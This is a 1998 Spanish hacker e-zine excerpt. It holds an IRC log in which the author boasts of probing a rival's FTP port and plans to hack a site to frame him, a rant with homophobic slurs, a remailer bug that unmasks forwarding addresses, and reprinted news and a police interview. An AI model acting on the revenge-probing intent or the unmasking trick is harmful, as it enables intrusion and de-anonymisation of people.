*** Atic was kicked by ufo (Mass Deop Protection! (4 Deops in 0 second(s) of 10. (7th Sphere)

[ Guaaaaaauu ]

<NunotReeZ> X)
<ufo> pxxxxxx
<ufo> xapusero.....
<NunotReeZ> muerte
<\W3nd|g0> ese ufillo
<\W3nd|g0> ya la esta liandu
<\W3nd|g0> XDDDDDDDDDDDDDDD
<EMF> ei, muerte
- entra Atic (2HG@ctv21225131009.ctv.es4)
<NunotReeZ> pheorl
<NunotReeZ> X)
<EMF> kel the_ray
<Atic> xD
<MuErTe> juer
<EMF> se mete al team
<MuErTe> ke rallada
<MuErTe> xD
*** CuasI sets mode: +o Atic
<MuErTe> diosssssss
<MuErTe> noooo
<MuErTe> noooo
<MuErTe> noooo
<MuErTe> noooo
<MuErTe> noooo
<MuErTe> el gay del asidorrrr
<ufo> yasta .puedes pasar
<MuErTe> aki!!
<ufo> NOOOOOOOOOOOOOO
<MuErTe> noooooooooooooooo
<ufo> NOOOOOOOOOOOOOO
<AciD-KrS> muhahahaha
<MuErTe> xD
<ufo> UN GAYYYYYYYYYYYYYYYYYYY
<ufo> UN GAYYYYYYYYYYYYYYYYYYY
<AciD-KrS> Puto!!
<ufo> UN GAYYYYYYYYYYYYYYYYYYY
<ufo> UN GAYYYYYYYYYYYYYYYYYYY
<ufo> UUAAUAAUAUAUAUAUAAUAUAUAUAAUA
<inf> XDDDDDDDDD
<ufo> EL MARINERITO LEREEEEEEEEE
<ufo> EL MARINERITO LEREEEEEEEEE
<ufo> MUHAAHAHAHAHAHAHHAHAHAHAHAHHAHAHAHH
<ufo> MUHAAHAHAHAHAHAHHAHAHAHAHAHHAHAHAHH
<ufo> MUHAAHAHAHAHAHAHHAHAHAHAHAHHAHAHAHH
<AciD-KrS> bUFOn!!!!
<ufo> MUHAAHAHAHAHAHAHHAHAHAHAHAHHAHAHAHH
<inf> marike?
<AciD-KrS> Kpull00!
- entra \W3nd|g0 (2IRcap.3@195.235.64.574)
<AciD-KrS> x´D
*** cheme sets mode: +o \W3nd|g0
<MuErTe> .
<MuErTe> weno jentusa
<MuErTe> ara si ke me voin
<MuErTe> weno no
<MuErTe> tengo ke hablar kon alguien
<MuErTe> xD
<\W3nd|g0> ?
<MuErTe> lo siento Wendi..
<MuErTe> kontigo no :)
<\W3nd|g0> mia k me habia esho la idea de k te ivas
<\W3nd|g0> ia me has amargao la noshe
<MuErTe> mauhauahauahuahaua
<MuErTe> xD
<\W3nd|g0> :o/
<\W3nd|g0> XDDDDDDDDDD
<\W3nd|g0> esta te la guardo
<\W3nd|g0> MUhahahAHAhAhahahaha
<MuErTe> byezz all
<MuErTe> menos al guy
<MuErTe> xD
<MuErTe> kes mu pheo
<MuErTe> xD
*** Atic has quit IRC (Ping timeout for Atic[ctv21225131009.ctv.es])
<MuErTe> @q1234 ] [IRcap.41@X.X.X.X
<MuErTe> mm
<MuErTe> akaso me intentabas hackear lamerazo?

[ jejeje ... tu sigue insultado y diciendo tonterias que yo mientras
hago 'algunas cosillas' por ahi ... Mmmm ese puerto 21 ... ]

<\W3nd|g0> uish
<MuErTe> 179 ? S 0:00 ftpd: X.X.X.X: anonymous/anon@ana\010on.com: IDLE
<\W3nd|g0> ia hay greña
<MuErTe> mmm
<MuErTe> putos lamers!!

[ si si ... pero yo ya tengo una cuenta mas para conectarme a Internet
... la reservare para hackear algun site y dejar tus huellas de
redestb ... veremos quien es mas lamer ... ]

<\W3nd|g0> :o)
<MuErTe> yeske no los soporto kagondios!
- entra Atic (2HG@ctv21225130161.ctv.es4)
*** MuErTe sets mode: -o+b q1234 *!*?R?a?.?1@?9?.?6.?1.?9?
*** You were kicked by MuErTe (Banned forever!!!)
*** Attempting to rejoin...
Session Close: Mon Nov 23 01:47:17 1998

[ que rapido me ha echado ... acaso tenia miedo? Uuuuuuuuh ... si en
el fondo no es mas que un pedazo de mierda ... ]

[ por cierto ... a ver si tienes cojones y nos quitas tambien la web
a nosotros ... ]


NOTA IMPORTANTE !!!!!! se supone que Mierda (digo, muerte) no leera este
articulo porque el es 31337, al igual que algunos amigos suyos, pero hay otros
que si lo haran y que frecuentan el IRC. Quiero que quede claro que yo no he
provocado a nadie para que dijera nada en el canal. No me he hecho pasar por
nadie para ver vuestra reaccion. Simplemente puse un trozo de log ... si os
molesta leer vuestros propios comentarios, es como si os molestara miraros al
espejo ... Y otra cosa. yo tengo grandes amigos en el IRC (Nobody, Homs, Lobo,
wendigo, ufo, arusha, etc) y se que, afortunadamente, los gilipollas son una
minoria, pero los hay ... y el que quiera que se de por aludido.

REFLEXION: si leemos bien estos logs podemos llegar a la conclusion de que hay
dos tipos de hackers, la 31337 y los lamers, que paso a describir a
continuacion:

1) Un hacker 31337 es aquel que cumple las siguientes caracteristicas:
- Aprende a escribir con 'k' en vez de 'c', 'z' en vez de 's' y sobre
todo ... numeros que sustituyan las letras ...
- Es op en algun canal de hack de IRC.
- Tiene un nick original (CaseZero, MuErTe, SuperHacker, Cool, r00t)
- Consigue banear entre 10 y 20 newbies diarios. (Los lamers, que
describire a continuacion, valen 5 puntos).
- Debe pertenecer a algun grupo organizado, por supuesto, con mas
gente del canal (y que tambien sean op's) pero solo para hackear.
Que se jodan los que no saben!!! nada de articulos (Mmmmm ... no
sera que no tienen capacidad para escribir ninguno???)

2) Por el contrario, un indeseado lamer es aquel que:
- Solo entra en el IRC para chatear con los amigos (Arggggg ... que
aburrido ... solo chatean ... ni banean a nadie ni se pasan cuentas
shell ...)
- Escribe articulos para alguna ezine (que lamer!!! ayudando a los
newbies!!! es que no sabe que donde realmente se aprende es en IRC?
ademas, a los newbies no hay que ense¤arles ... hay que banearles!!)
- Hackea sus propias cuentas shell ... (eyy!!! para que??? si mi amigo
_Fet1d0_ me las pasa por IRC!!! para que voy a molestarme en
conseguirlas yo mismo? asi solo tengo que entrar cargado con
exploits (todos los que pille por ahi ..) y probar a ver si me hago
r00t).

Bueno, parece que esta claro, no?


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ N o t i c i a s ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

BUG EN REMAILERS

Hace unas semanas Senpai descubrio un bug en el remailer de iname
(www.iname.com) en el que cualquier usuario puede descubrir la direccion del
forward a la que se redirigen los mails de un usuario. Para ello el servidor
a donde va redirigido el correo ha de estar 'down' o saturado.

Si enviamos un mail a HackerMan@iname.com (o cualquier otro dominio de iname),
y el mail debe redirigirse a federico@arrakis.es, si el servidor de arrakis se
encontrara inoperativo al recibir el mail, iname nos devolveria un mensaje
como que no encontro el destino (al igual que hacen todos los servidores de
correo) pero con un peque¤o fallo. En el mail nos vendria:
'No se encontro la direccion federico@arrakis.es'
Con lo que ya sabriamos cual es el proveedor de ese usuario.

Una semana despues, PaTa descubrio el mismo bug en Bigfoot.

Y como buenos usuarios de iname y bigfoot que somos, ya hemos advertido a los
administradores para que subsanen estos problemas. Segun ellos lo estan
tratando. De todas maneras os explico como podeis 'protegeros' si usais estos
remailers:

1) Si teneis un buzon anonimo (hotmail, axis, latinmail, etc) no hay problema.
Basta con que cambieis de buzon con algo de frecuencia. Pero tener en cuenta
que estos servidores gratuitos son los que mas suelen fallar, o sea que tener
cuidado e ir cambiando de buzon con frecuencia.

2) Si los mails se redirigen a los buzones que os han asignado vuestros
proveedores, esta claro que no quereis que nadie sepa si po canectais a traves
de arrakis, redesTB, o lo que sea. Bien, pues usar dos remailers. Por ejemplo:
iname -> bigfoot -> arrakis

Eso es todo. Os informaremos cuando tengamos mas noticias.

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

APPLE CONFIRMA EL BUG SHERLOCK EN MAC OS 8.5

Este bug en el sistema de busqueda del sistema operativo mas reciente de los
Mac (del que informamos en el boletin anterior) acaba de ser reconocido por
Apple:

http://www.news.com/News/Item/0%2C4%2C28189%2C00.html?dd.ne.tx.fs4.1102

La empresa no se ha pronunciado aun sobre las denuncias efectuadas por algunos
usuarios acerca de otros posibles bugs que provocarian perdida de datos.

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

(Articulo editado por el diario 'El Mundo')

TENIENTE ANSELMO DEL MORAL, JEFE DEL GRUPO DE DELITOS INFORMATICOS DE LA
GUARDIA CIVIL "Los hackers son un poco autistas"

El Teniente Anselmo del Moral dirige el brazo armado de la Benemerita en la
Red. Afable y extrovertido, ha cambiado la pistola por un modem y no lleva
tricornio cuando se sienta a navegar por Internet. Del Moral piensa que la Red
es un lugar que se puede utilizar para todo tipo de actividades: "Nosotros
solo estamos para investigar las delictivas".

OLALLA CERNUDA / PEDRO DE ALZAGA

DIARIO DEL NAVEGANTE.- Como y por que se decide crear la Unidad de Delitos
Informaticos?

TENIENTE DEL MORAL.- En 1990 se forma la Unidad Central Operativa de Policia
Judicial de la Guardia Civil, compuesta por diferentes
grupos de investigacion muy especializados, que llevan a
cabo una labor de apoyo al resto de las unidades de la
Guardia Civil en casos especeficos, como robo de obras de
arte, delincuencia organizada, delincuencia economica,
etc.

En 1996 surge la necesidad de prestar tambien apoyo en la
investigacion de delitos informaticos o de alta
tecnologia. Sobre todo porque en el Codigo Penal de 1995
aparecen delitos que pueden considerarse informaticos,
bien por los medios utilizados para su comision o por el
objeto del delito en si.

Por aquel entonces yo pertenecia a un grupo encargado de
investigar delitos violentos y homicidios y habia cursado
estudios de analisis de gestion en informatica.

Mis superiores me requirieron para formar el nuevo grupo
de investigacion. Hice una seleccion de personal y escogi
a tres hombres para la nueva unidad. El siguiente paso
fue el de formarnos en este nuevo campo y establecer una
metodologia de trabajo. Asistimos a diversos cursos, como
el que organizo el FBI en Nueva York, que nos permitieron
conocer como se estaba luchando contra este tipo de
delincuencia en otros paises.

DIARIO DEL NAVEGANTE.- Y cuando empiezan a trabajar?

TENIENTE DEL MORAL.- Finalizado el periodo de formacion, se creo oficialmente
el Grupo de Delincuencia Informatica y nuestro primer
servicio fue la Operacion Toco, en marzo de 1997. Se
trataba de la entrada ilegal en un servidor de la
Universidad de Tarragona. A partir de entonces, empiezan
a recibirse denuncias y casos sobre los que empezar a
trabajar.
Actualmente, tenemos muchos casos abiertos e, incluso
empezamos a estar desbordados. Ademas, estamos estudiando
el cambio de denominacion a Grupo de Investigacion de
Delitos de Alta Tecnologia, pues ya no solo se presentan
delitos informaticos, sino casos de fraude en las
telecomunicaciones - falsificacian de tarjetas GSM -,
microprocesadores remarcados, etc. Fraude en las
telecomunicaciones o fraude electronico - compras
realizadas a traves de Internet -.

DIARIO DEL NAVEGANTE.- Han recibido algun tipo de formacion especializada?

TENIENTE DEL MORAL.- Los miembros del Grupo ya contabamos con formacion
procesal y penal -somos miembros de la Policia Judicial-,
pero estaba claro que necesitariamos preparacion tecnica.
Nos pusimos en contacto con las universidades de
Tarragona y Politecnica de Catalu¤ a y se organizaron
cursos para que los miembros del Grupo recibieran
formacion intensiva en comunicaciones, Linux, analisis de
logs, medios de almacenamiento masivo, encriptacion,
entre otras muchas cosas y de acuerdo a las denuncias que
se nos iban presentando.

DIARIO DEL NAVEGANTE.- Que tipo de denuncias recibe el Grupo?

TENIENTE DEL MORAL.- Normalmente se trata de delitos recogidos en el Codigo
Penal que se refieren a la revelacion de secretos o
acceso no autorizado a sistemas informaticos, a da¤os a
sistemas informaticos y a la copia ilegal de programas o
a falsificacion de componentes. Incluso el envio masivo
de correo electronico -lo que se conoce como SPAM- puede
considerarse un uso no autorizado de las
telecomunicaciones.
En cualquier caso, intentamos trabajar desde un punto de
vista pragmatico, policial, y no entramos a valorar la
novedad o antiguedad del delito, lo unico que sabemos es
que en todos ellos existe una dificultad tecnica y sobre
ella trabajamos.

DIARIO DEL NAVEGANTE.- Quienes son los principales denunciantes en Espa¤a?

TENIENTE DEL MORAL.- Eso depende del tipo de delito. En los casos que nosotros
hemos estudiado mas en profundidad -sobre todo los de
entrada ilegal en un sistema o "hacking"- los principales
denunciantes han sido proveedores de Internet y
Universidades.
Tambien tenemos conocimiento de accesos no autorizados a
instituciones del pais e incluso a entidades bancarias,
pero estos casos no han sido denunciados. Lo sabemos por
la confesion de alguno de los "hackers" detenidos, que
han declarado saber entrar en estos sistemas.

DIARIO DEL NAVEGANTE.- Y el Grupo puede actuar sin que haya una denuncia de
alguna persona afectada?

TENIENTE DEL MORAL.- Si, se puede actuar cuando el delito afecta a una
pluralidad de personas, como indica el Codigo Penal.
Cuando hay muchas personas afectadas no hace falta una
denuncia para poder actuar, como, por ejemplo, el caso de
un banco aleman al que este verano robaron las claves de
sus clientes y les chantajearon con hacerlas publicas.
Aunque el banco no denuncio el caso por temor al
desprestigio la policia actuo por que afectaba a un
colectivo muy grande. En Espa¤a sucederia lo mismo.

DIARIO DEL NAVEGANTE.- Nos podria contar algun caso de los que han resulelto
favorablemente?

TENIENTE DEL MORAL.- Uno de los casos de coordinacion entre comunidades
autonomas fue en Sevilla. Un proveedor de Internet estaba
boicoteando, mediante ordenadores, a un competidor, para
quitarle su clientela. El proveedor contrato a un joven
que sabia manejar un programa denominado "tear drop",
capaz de lanzar paquetes cada diez minutos a una
determinada direccion y, por tanto, dificultando el
funcionamiento de un sistema. Ademas, el programador
habia disfrazado la direccion de origen de los paquetes,
sustituyendola por una perteneciente a la red del
proveedor atacado. Para este, el ataque provenia de su
propio sistema.
Al mismo tiempo que el programa atacaba, en los momentos
de mayor conexion, el gerente de la empresa atacante
llevaba a cabo una captacion de los clientes de su
competidor, que, logicamente, estaban descontentos con el
servicio.
Este caso pudimos resolverlo por la vanidad del
programador. Se considero tan bueno que lo fue contando a
muchas personas. Nosotros recogimos esas manifestaciones
hasta conseguir el permiso para registrar su casa y alli
descubrimos el programa "tear drop" en sus ordenadores.

DIARIO DEL NAVEGANTE.- La BSA ha presentado denuncias?

TENIENTE DEL MORAL.- La BSA ha trabajado con nosotros en casos de copia ilegal
de programas. Ahora mismo recuerdo una operacion en
Sevilla en la que se intervinieron 9.800 CD. Pero estos
son servicios que no requieren una gran preparacion
tecnica y cualquier unidad de la Guardia Civil podria
llevarlos a cabo. El GDI suele actuar cuando hay una
organizacion, un montante economico elevado, varias
comunidades autonomas implicadas o es necesario coordinar
acciones con el extranjero. En otros casos, nuestra labor
se reduce a dirigir la informacion a nuestras unidades
territoriales.

DIARIO DEL NAVEGANTE.- Han recibido denuncias de bombardeo de correo?

TENIENTE DEL MORAL.- Si, pero todavia ninguna se ha formalizado. Mucha gente
nos ha contado que desde una cuenta de correo se les han
enviado miles de mensajes de correo electronico. Lo que
dice el Codigo Penal al respecto es que tiene que haber
un perjuicio, pero cuando el denunciante se pone a
valorarlo no lo hace en cuanto a las horas que tarda un
tecnico en arreglarlo, o el coste que ha supuesto a la
empresa tener el sistema apagado. Todo esto tiene que
superar las 50.000 pesetas para que se considere delito.

DIARIO DEL NAVEGANTE.- Que validez tiene un "log" como prueba?

TENIENTE DEL MORAL.- En el Codigo Penal de 1995 no hay jurisprudencia sobre el
uso de logs. La mayoria de los casos en los que se ha
aportado un log como prueba estan todavia a la espera de
juicio. Asi que, para ser justos, no sabemos la validez
puedan tener.
Cuando vamos a, pongamos por caso, un proveedor, el nos
entrega una copia impresa del log, que nosotros cotejamos
con lo registrado en la maquina. Es cierto que los log
pueden ser objeto de manipulacion, pero hasta el momento
no hemos encontrado ningun caso de denuncia falsa.
Nosotros sabemos analizar un log e interpretarlo, pero,
ademas, siempre contamos con la ayuda de expertos. El
procedimiento habitual consiste en enviar el log al
centro de Coordinacion de Emergencias de Redes
Telematicas (CERT), un centro publico de reconocido
prestigio nacional e internacional. Ellos nos remiten
informes tecnicos que recogen lo que se ha detectado y se
adjuntan a las diligencias. El criterio del CERT nos da
la seguridad de no equivocarnos en cuanto a las
conclusiones que hemos extraido.
Por su parte, los jueces estan aceptando estos informes
como pruebas documentales, una evidencia documental de lo
que ha pasado. El hecho de que durante el proceso se
demuestre que el log ha sido manipulado provocaria una
situacion parecida a la de otros tantos juicios en los
que se alega falsedad documental o de cualquier otro tipo
de actividad. En el caso de delincuencia economica,
cuando alguien denuncia una estafa y presenta un papel,
una factura o un recibo, en definitiva esta presentando
un objeto que tambien es manipulable. Pero, al final, la
manipulacion es un delito y si se descubre, el
perjudicado sera el.
Repito que, hasta el momento, lo que se ha detectado
corresponde exactamente con lo denunciado. Esto no quiere
decir que en el futuro no nos intenten enga¤ar, pero el
filtro que hacemos es una verificacion por nuestra parte
y por la de expertos.

DIARIO DEL NAVEGANTE.- Como es el perfil del delincuente informatico espa¤ol?

TENIENTE DEL MORAL.- Segun los casos que hemos llevado, podriamos clasificar a
los delincuentes informaticos en tres grupos.
El primero, el grupo de los "hackers", estaria compuesto
por jovenes varones, de entre 17 y 30 a¤os, con gran
capacidad y conocimientos tecnicos. Gente que en su mundo
son verdaderos genios - su trabajo nos ha impresionado en
muchas ocasiones-, pero a veces un poco "autistas", si se
me permite la expresion.
Frecuentan universidades o cibercafes, utilizan el IRC
como medio para intercambiar conocimientos y forman
grupos. A nosotros nos ha impresionado lo organizados que
pueden llegar a ser -tienen sus propias reglas, sus
sistemas de encriptacion-. Si esas reglas y metodos de
trabajo se extrapolasen a otros grupos de delincuencia
seria un verdadero problema. La mayor parte de ellos
cometen los delitos como un reto intelectual, pero el
resto sabe perfectamente que lo que esta haciendo es
delictivo. Esta minoria suele actuar como lider y hay una
gran mayoria que se siente atraida por ellos.
Los casos que hasta ahora hemos tenido en Espa¤a quiza no
son de una gravedad maxima, pero el conocimiento tecnico
de estas personas podria llegar a ser peligroso. Por
poner un ejemplo, nosotros hemos detectado casos de
intrusion en el sistema informatico del aeropuerto.

El segundo grupo lo formarian las redes de delincuencia
organizada, distribucion a traves de Internet o grupos de
copia ilegal de programas, que suelen estar compuestos
por personas que trabajan en tiendas de informatica. Lo
verdaderamente curioso es que hay gente que puede vivir
exclusivamente de esto, pues hemos detectado algun caso
en el que las ganancias llegaban a ser de un millon de
pesetas diario. Son gente mas mayor y su labor no
requiere conocimientos tecnicos elevados.

El tercer grupo, referido al fraude en equipos y
componentes, esta compuesto por grandes empresas en
Espa¤ a -cuatro o cinco- que se dedican a importar del
sudeste asiatico - Hong Kong, Vietnam, Taiwan- y de EEUU-
Miami- mediante barcos e, incluso, aviones,
microprocesadores remarcados para posteriormente
distribuirlos en unas 200 empresas del territorio
nacional. Estas compa¤ias venden ordenadores clonicos muy
baratos y saben perfectamente que los microprocesadores
que estan vendiendo son falsos, remarcados. Al final, el
defraudado es el consumidor de la calle, el ciudadano.

En este grupo hemos encontrado empresas que empezaron
hace cinco a¤os con un capital de 5 millones de pesetas y,
hoy en dia, facturan 1.200 millones.

DIARIO DEL NAVEGANTE.- Como se puede actuar contra delitos fuera de nuestras
fronteras?

TENIENTE DEL MORAL.- Nosotros asistimos a muchas conferencias internacionales
y estamos en contacto con las policias de otro paises, de
Estados Unidos, Alemania, Inglaterra, etc. Desde nuestra
fundacion hemos sido invitados a participar en foros
internacionales. El primero de ellos fue en Nueva York,
en el que nos invitaron a participar en la reunion que se
celebra en la secretaria general de Interpol, en Lyon
(Francia). De alli salio un grupo de trabajo de expertos
policiales de ocho paises, entre ellos el nuestro, que
nos reunimos cada tres meses, para exponer nuestros casos,
los modus operandi, etc. Hemos podido comprobar que los
delitos y las formas de actuacion practicamente coinciden
en todos los paises: el remarcado de microprocesadores,
el hacking, etc.
De esta cooperacion han salido procedimientos conjuntos
para que nos podamos comunicar los datos de los logs
rapidamente y podamos identificar a una persona, aunque
utilice otro pais como puente para atacar un sistema.
Tambien estamos involucrados en otros proyectos, como el
desarrollo de cursos de Interpol, en los que participamos
como ponentes, para paises del este de Europa. Ademas,
tenemos buenos contactos con casi todas las policias del
mundo, y colaboramos en estos temas.
Y no solo pertenecemos a la Interpol, sino que estamos en
contacto con otras organizaciones internacionales, como
la IOCE (International Organization of Computer Evidence),
formada por empresas especializadas en el sector de la
informatica y que pueden ayudarnos a conocer y reconocer
evidencias en ordenadores. Hay empresas que venden
programas para "reventar" ficheros encriptados o para
interceptar correo electronico. En estos congresos,
coincidimos con estas empresas y con gente del mundo de
la lucha contra la delincuencia informatica, y agencias
de inteligencia, como la CIA o el Mossad.
Otra reunion a la que vamos con frecuencia es la de
laboratorios forenses, para que podamos utilizar los
distintos laboratorios de Europa por si necesitamos su
colaboracion o ellos la nuestra.
El resultado es que ahora mismo estamos trabajando en
casos con el FBI, Scotland Yard, la policia sueca...
Porque es muy habitual que se realicen conexiones
intermedias desde maquinas de otros paises poco
protegidos que se utilizan como puente para atacar en
Espa¤a. Las pruebas deben incorporarse al procedimiento
espa¤ol pero pidiendo comisiones rogatorias a otros
paises.
Cuando todo se produce en Espa¤a es relativamente rapido
dar con los delincuentes, solo hay que seguir la pista
hacia atras de las conexiones. Pero cuando hay un pais
intermedio, como en el caso de Hispahack, que operaba
desde Gibraltar, el proceso es mucho mas lento. Debido a
los problemas burocraticos, las extradiciones de personas
que han cometido delitos en otros paises son muy lentas.

DIARIO DEL NAVEGANTE.- Donde termina la libertad de expresion y comienza el
delito?

TENIENTE DEL MORAL.- Nosotros actuamos siempre de acuerdo al Codigo Penal, y
tras la denuncia de una persona afectada. En el Codigo se
define claramente el delito de apologia, y si encontramos
una pagina web que segun al ley esta realizando apologia,
podriamos actuar. Pero hasta ahora no hemos encontrado en
Internet grupos de este tipo, o, mejor dicho, si los
hemos encontrado, pero en otros paises.

DIARIO DEL NAVEGANTE.- Que hay de cierto en lo que se cuenta sobre la
pornografia infantil en la Red?

TENIENTE DEL MORAL.- En Espa¤a este tema no esta regulado como en otros paises.
Aqui se considera delito la difusion de imagenes
pornograficas entre menores de edad, pero en Internet no
se puede saber cuantos menores de edad estan viendo una
fotografia de este tipo. Lo que si es delito es someter a
un menor a practicas pornograficas. Si nosotros a traves
de las fotos llegamos al lugar donde se han realizado y a
la persona que lo hace, se le detiene. Pero que haya
proveedores de Internet que se dedican a coger fotos de
la Red y colocarlas en sus paginas no es delito. En otros
paises la difusion de este tipo de imagenes esta regulada,
pero ademas tienen gente constantemente oteando la Red en
busca de estas fotos. Eso es un trabajo impresionante de
tiempo y trabajo. Pero nosotros, por la legislacion que
hay en Espa¤a, aunque lo encontrasemos no podriamos hacer
nada.

DIARIO DEL NAVEGANTE.- El comercio electronico en Espa¤a es seguro?

TENIENTE DEL MORAL.- El comercio electronico en bancos y grandes instituciones
es muy seguro. Todos ellos estan utilizando protocolos de
seguridad muy fiables, sistemas criptograficos para las
transacciones economicas. Desde ese punto de vista si
podemos afirmar que el comercio electronico es seguro.
Ahora bien, estamos recibiendo muchas denuncias de
empresas que montan una cibertienda y solo piden a sus
clientes los datos de la VISA y la fecha de caducidad de
la misma. No saben que en Internet pueden encontrarse
programas capaces de generar numeros de VISA y sus
respectivas fechas de caducidad y utilizarlos despues
fraudulentamente.
Estamos recibiendo un aluvion de denuncias por parte de
esas peque¤as empresas.

DIARIO DEL NAVEGANTE.- Como les afectara el uso de la criptografia privada, la
particular?

TENIENTE DEL MORAL.- En Internet hay una serie de riesgos y una serie de
oportunidades. En cuanto a la legislacion, hay paises muy
prohibitivos, como Francia, donde esta prohibido el envio
de mensajes de forma encriptada, y solo se permite un
cierto grado de encriptacion pero tiene que ser declarado
a una especie de agencia de proteccion de datos.
Los americanos tambien tienen algo parecido. En otros
paises el desarrollo y uso de la encriptacion es libre o
no esta regulado, como ocurre en Espa¤a.
Y en cuanto a riesgos de la encriptacion, el uso por
parte de delincuentes ya ocurre en Espa¤a. Se han
utilizado comunicaciones encriptadas por parte de grupos
organizados. Pero tambien esto tiene muchas utilidades,
sobre todo para el comercio electronico, ya que su futuro
pasa por la encriptacion.

DIARIO DEL NAVEGANTE.- Que le parecen las movilizaciones que se estan llevando
a cabo en Espa¤a para que se implante la tarifa plana?

TENIENTE DEL MORAL.- Ante esto nos mantenemos al margen, porque nosotros
entramos a la Red a trabajar, no podemos ocuparnos de
otras cosas. Cada pais tiene su problematica y sus
historias. Es cierto que parece que en Espa¤a las tarifas
son algo mas caras que en Europa, pero tambien es cierto
que aqui hay muchisimos mas proveedores que en otros
paises.
Nosotros nos mantenemos al margen porque no creo que
tengamos que decir nada sobre esto.

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

NUEVO VIRUS DE WEB

Se acaba de anunciar el descubrimiento de un nuevo virus basado en web que
puede entrar en los ordenadores de los usuarios simplemente visitando una
pagina web. El virus, denominado HTML.Internal por el distribuidor de
antivirus que lo descubrio, no produce ningun dano, pero segun la empresa
podria ocasionar algun problema. El peligro lo tienen principalmente los
usuarios de Explorer e Internet Information Server, de Microsoft. Si se esta
usando Netscape u otro navegador, no hay ningun peligro. La forma de contagio
es visitando una pagina web con el virus en el servidor, el cual hace una
llamada al lenguaje de scripts de Visual Basic para realizar una busqueda en
los discos duros locales de archivos con extensiones .HTM o .HTML. Al cargar
una pagina infectada, el mensaje superior es "HTML.Prepend /1nternal." La
forma de evitar el contagio es manteniendo la seguridad de Internet Explorer
al menos en nivel Medio, ya que avisara a los usuarios que HTML.Internal esta
buscando en los discos duros.

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

(Articulo extraido del diario 'El Pais Digital')

UNA JUEZ PIDE APOYO AL FBI PARA INVESTIGAR UN ATAQUE INFORMATICO
CONTRA EL MINISTERIO DEL INTERIOR (EN ESPA¥A)

Los piratas, presumiblemente espa¤oles, actuaron a traves de California para
ocultarse. La titular del juzgado de Instruccion numero ocho de Madrid,
Rosario Espinosa, ha pedido apoyo a la Oficina Federal de Investigacion de
Estados Unidos (FBI) para identificar a quienes atacaron el sistema
informatico del Ministerio del Interior entre los dias 6 y 11 de junio. El
ataque se efectuo desde ordenadores de la empresa Hotmail, con sede en
California, que facilita una direccion de correo electronico sin comprobar la
identidad del cliente. Los piratas informaticos cometieron un presunto delito
de revelacion de secretos, segun fuentes proximas a la investigacion.

La juez ha dirigido una comision rogatoria internacional al FBI para que
recabe de la empresa Hotmail los datos necesarios para intentar identificar,
lo que resulta muy dificil, a los hackers (piratas informaticos) que atacaron
los ordenadores del Ministerio del Interior.

Los hackers accedieron a datos de caracter reservado, por lo que las
diligencias previas se han abierto por un presunto delito de revelacion de
secretos, que el articulo 197 del Codigo Penal castiga con penas de entre uno
y cuatro a¤os de prision. La investigacion judicial apunta a una presunta
apropiacion o incluso modificacion de ficheros informaticos del Ministerio del
Interior.

Hotmail Corporation, recientemente adquirida por Microsoft, la firma de Bill
Gates, es la principal suministradora mundial de cuentas gratuitas de correo
electronico, con unos 10 millones de usuarios. Utilizan sus servicios quienes
no quieren pagarse una cuenta de correo o desean guardar el anonimato, pues la
compa¤ia facilita a sus clientes la posibilidad de dotarse de una direccion
electronica nueva sin verificar la autenticidad de los datos personales que
aportan.

En su pagina de presentacion en Internet, Hotmail asegura que sigue la
politica de "respetar la privacidad de sus socios, excepto si debe
quebrantarla por imperativos legales", y que la empresa no se considera
responsable "de cualquier dato que resulte, directa o indirectamente, del uso"
de sus servicios.

Los ordenadores de Interior solo registraron la direccion facilitada por
Hotmail al pirata informatico, el equivalente a un apartado de correos. El
hecho de que el ataque se lanzase desde Estados Unidos no significa que su
autor sea un residente en dicho pais. Mas bien se sospecha que el origen esta
en Espa¤a y que el ordenador norteamericano sirvio de paso intermedio para
borrar huellas.

Con el objetivo de identificar al agresor, la juez ha pedido al FBI el fichero
LOGS en el que se registran las conexiones realizadas durante los dias en que
se produjo el ataque con el ordenador de Hotmail donde esta ubicado el correo
electronico que empleo el hacker, asi como los numeros IP correspondientes a
dichas conexiones.
Son los dos rastros informaticos a partir de los cuales es posible, con mucha
paciencia y un poco de suerte, ir tirando del hilo y llegar hasta el agresor.

El fichero LOGS permitira conocer las operaciones realizadas desde dicho
correo electronico y los numeros IP llevaran hasta el servidor de acceso a
Internet utilizado por el pirata informatico. Aunque el usuario no tiene
siempre el mismo numero IP, la empresa suministradora de acceso a Internet
puede localizar que cliente utilizo un numero a una hora concreta.

El siguiente paso de la investigacion consistira, por tanto, en saber que
usuario de Internet empleo dicho numero IP durante la madrugada del sabado 6
de junio, cuando el ataque informatico contra Interior alcanzo su maxima
intensidad.

En Estados Unidos, la pirateria informatica constituye una de las principales
preocupaciones de la Administracion y de muchas empresas. Las ordenadores del
Pentagono, objetivo preferente de los hackers, sufren unos 250.000 intentos de
ataque cada a¤o y su portavoz tuvo que reconocer recientemente que un grupo
internacional de piratas habia logrado introducirse en el sistema de
telecomunicaciones de la Defensa.

En Espa¤a hay menos precedentes ya que, hasta ahora, la investigacion se ha
centrado en perseguir la venta de copias ilegales de programas. Sin embargo,
la Guardia Civil detuvo en abril pasado a dos empleados de una empresa de
Gibraltar y a un profesor de Aviles (Asturias) acusados de formar un grupo
